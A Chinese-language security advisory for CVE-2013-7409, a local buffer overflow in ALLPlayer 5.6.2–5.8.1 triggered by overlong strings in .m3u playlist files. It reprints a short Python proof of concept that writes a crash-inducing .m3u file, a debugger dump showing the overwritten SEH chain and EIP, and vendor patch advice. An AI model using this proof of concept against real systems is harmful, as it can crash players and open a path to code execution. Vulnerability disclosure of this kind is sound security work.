ALLPlayer 5.6.2版本本地缓冲区溢出漏洞

发布日期：2014-10-30
更新日期：2014-11-04受影响系统：
ALLPlayer ALLPlayer 5.6.2－5.8.1
描述：
CVE（CAN） ID: CVE-2013-7409 ALLPlayer是媒体播放软件。ALLPlayer 5.6.2－5.8.1版本在实现上存在缓冲区溢出漏洞，远程攻击者通过.m3u文件内的较长字符串，利用此漏洞可造成拒绝服务和执行任意代码。<*来源：metacom
*>测试方法：警告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
metacom （）提供了如下测试方法：Title: ALLPlayer Local Buffer Overflow PoC UNICODE
Vendor: http://www.allplayer.org/download/allplayer
Date found: 09.10.2013
Date published: 09.10.2013
Platform: windows 7 German
Bug: Buffer Overflow UNICODE
----------------------------

1）VERSIONS AFFECTED
----
ALLPlayer 5.6.2 2）Proof of Concept
------------------

junk = "http://" buffer="x41" * 5000 exploit = junk + buffer try:
out_file = open（"ALLPlayer_Poc.m3u","w"）
out_file.write（exploit）
out_file.close（）
print "Exploit file created！"
except:
print "Error" 3）-（DEBUG）
----------
（1e60.1dec）: Access violation - code c0000005 （！！！ second chance ！！！）
*** WARNING: Unable to verify checksum for C:Program FilesALLPlayerALLPlayer.exe
*** ERROR: Module load completed but symbols could not be loaded for C:Program FilesALLPlayerALLPlayer.exe
eax=00000000 ebx=00000000 ecx=00410041 edx=770d720d esi=00000000 edi=00000000
eip=00410041 esp=000311c4 ebp=000311e4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
ALLPlayer+0x10041:
00410041 008bc0ff2504 add byte ptr [ebx+425FFC0h],cl ds:0023:0425ffc0=？？
0:000> ！exchain
---------------
0012e4b0: ALLPlayer+1b7037 （005b7037）
0012e734: ALLPlayer+10041 （00410041）
Invalid exception stack at 00410041 4）Credits
---------
metacom
Contact : metacom27 at gmail.com建议：
厂商补丁：ALLPlayer
---------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.allplayer.org/